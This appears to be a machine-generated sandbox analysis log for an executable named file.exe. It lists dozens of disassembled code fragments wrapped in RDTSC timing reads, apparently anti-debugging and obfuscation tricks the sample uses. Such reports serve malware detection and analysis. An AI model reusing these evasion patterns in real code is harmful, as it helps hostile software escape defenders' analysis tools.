                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D535 second address: D3D593 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F1770F379F8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov esi, dword ptr [ebp+122D299Ah] 0x0000002d xchg eax, ebx 0x0000002e pushad 0x0000002f jmp 00007F1770F37A03h 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D593 second address: D3D597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40C0B second address: D40C12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D416D3 second address: D416D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49886 second address: D4989C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4989C second address: D498A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F1770B77E96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D498A7 second address: D49917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F1770F379F8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D23CAh], eax 0x0000002a push 00000000h 0x0000002c jnl 00007F1770F379F9h 0x00000032 pushad 0x00000033 mov ecx, dword ptr [ebp+122D2B4Ah] 0x00000039 mov dword ptr [ebp+12475D71h], edi 0x0000003f popad 0x00000040 push 00000000h 0x00000042 jmp 00007F1770F379FCh 0x00000047 xchg eax, esi 0x00000048 jng 00007F1770F379FEh 0x0000004e push eax 0x0000004f jnp 00007F1770F379F6h 0x00000055 pop eax 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49917 second address: D4991B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4991B second address: D49925 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1770F379F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A907 second address: D4A94F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+124770BAh] 0x00000010 mov ebx, dword ptr [ebp+122D2AF6h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a mov edi, ebx 0x0000001c xchg eax, esi 0x0000001d je 00007F1770B77EA4h 0x00000023 push eax 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F1770B77EA3h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44936 second address: D4493C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E8F9 second address: D4E8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E8FD second address: D4E901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49A59 second address: D49A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E901 second address: D4E959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 sub bx, 869Ah 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F1770F379F8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D1EF4h], eax 0x00000031 jmp 00007F1770F37A07h 0x00000036 xchg eax, esi 0x00000037 push ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a jng 00007F1770F379F6h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49A5F second address: D49A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1770B77E9Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4DB8E second address: D4DB9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F379FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E959 second address: D4E95D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4ABD1 second address: D4ABD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49A74 second address: D49A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F1770B77E96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4DB9D second address: D4DBC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F1770F379FCh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4ABD6 second address: D4ABDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EB01 second address: D4EB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49A7E second address: D49A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76E07 second address: D76E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8064C second address: D80666 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77E9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jc 00007F1770B77E96h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F57D second address: D7F581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F89A second address: D7F8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F1770B77E9Ah 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F1770B77E96h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F8B7 second address: D7F8D1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1770F379F6h 0x00000008 jno 00007F1770F379F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 js 00007F1770F379F6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F8D1 second address: D7F8D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F8D5 second address: D7F8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1770F379FEh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F8EF second address: D7F92A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1770B77E9Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1770B77E9Fh 0x00000015 jnp 00007F1770B77E96h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FA5C second address: D7FA62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FD88 second address: D7FDA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F1770B77EA7h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FDA5 second address: D7FDA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FEDF second address: D7FEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F1770B77E9Bh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FEEF second address: D7FEF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FEF5 second address: D7FEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1770B77E96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FEFF second address: D7FF03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FF03 second address: D7FF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770B77EA1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FF1E second address: D7FF24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FF24 second address: D7FF3B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1770B77E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 jbe 00007F1770B77E96h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FF3B second address: D7FF3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FF3F second address: D7FF56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F1770B77E9Eh 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FF56 second address: D7FF5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D877A8 second address: D877AD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87450 second address: D87478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770F379FDh 0x00000009 pop edx 0x0000000a jmp 00007F1770F37A01h 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87478 second address: D87484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1770B77E96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87484 second address: D874B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F1770F37A02h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1770F37A00h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B36C second address: D8B375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC8B5 second address: CFC8B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AFD0 second address: D8AFD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AFD6 second address: D8AFE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1770F379F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AFE0 second address: D8AFE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9283C second address: D92848 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F1770F379F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D476B2 second address: D47734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jnc 00007F1770B77E96h 0x0000000c pop edi 0x0000000d popad 0x0000000e nop 0x0000000f call 00007F1770B77E9Eh 0x00000014 jne 00007F1770B77E9Ch 0x0000001a pop edi 0x0000001b mov ebx, dword ptr [ebp+12488753h] 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 call 00007F1770B77E98h 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e add dword ptr [esp+04h], 00000016h 0x00000036 inc eax 0x00000037 push eax 0x00000038 ret 0x00000039 pop eax 0x0000003a ret 0x0000003b xor dword ptr [ebp+12454FBEh], eax 0x00000041 add eax, ebx 0x00000043 push 00000000h 0x00000045 push ecx 0x00000046 call 00007F1770B77E98h 0x0000004b pop ecx 0x0000004c mov dword ptr [esp+04h], ecx 0x00000050 add dword ptr [esp+04h], 0000001Bh 0x00000058 inc ecx 0x00000059 push ecx 0x0000005a ret 0x0000005b pop ecx 0x0000005c ret 0x0000005d mov cx, di 0x00000060 nop 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47734 second address: D477B9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1770F379F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F1770F379F8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push ebx 0x00000016 jmp 00007F1770F37A02h 0x0000001b pop ebx 0x0000001c pushad 0x0000001d jmp 00007F1770F37A03h 0x00000022 jnl 00007F1770F379F6h 0x00000028 popad 0x00000029 popad 0x0000002a nop 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F1770F379F8h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 mov dword ptr [ebp+122D3A06h], ecx 0x0000004b mov ecx, dword ptr [ebp+122D2BFAh] 0x00000051 push 00000004h 0x00000053 stc 0x00000054 nop 0x00000055 jng 00007F1770F37A00h 0x0000005b pushad 0x0000005c pushad 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D924F8 second address: D92500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9512E second address: D95140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F1770F379FAh 0x0000000e push edx 0x0000000f pop edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D952C0 second address: D952C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95594 second address: D95598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95598 second address: D9559E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9559E second address: D955A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D955A3 second address: D955B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770B77E9Ah 0x00000009 pop ecx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED620 second address: CED626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D98DAB second address: D98DB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D98DB2 second address: D98DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D98F30 second address: D98F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D98F36 second address: D98F86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F379FBh 0x00000007 jmp 00007F1770F37A02h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1770F37A07h 0x00000015 jmp 00007F1770F37A06h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D98F86 second address: D98F96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1770B77E9Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D990E7 second address: D990EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA17AD second address: DA17BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F1770B77E96h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA17BF second address: DA17D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770F379FCh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA17D0 second address: DA17DA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1770B77E9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA17DA second address: DA17FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1770F37A00h 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F1770F379F6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA17FE second address: DA180A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F1770B77E96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA180A second address: DA1824 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A04h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9F92E second address: D9F932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9F932 second address: D9F93C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1770F379F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FAAB second address: D9FAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FAAF second address: D9FAB9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1770F379F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FAB9 second address: D9FAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F1770B77EA5h 0x0000000c jmp 00007F1770B77E9Fh 0x00000011 pop edi 0x00000012 jc 00007F1770B77EACh 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007F1770B77E96h 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FC13 second address: D9FC17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FC17 second address: D9FC27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jng 00007F1770B77E96h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FC27 second address: D9FC2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FC2D second address: D9FC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA06ED second address: DA06F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1770F379F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA06F9 second address: DA071C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F1770B77EA8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA071C second address: DA0720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0720 second address: DA072A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0A36 second address: DA0A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
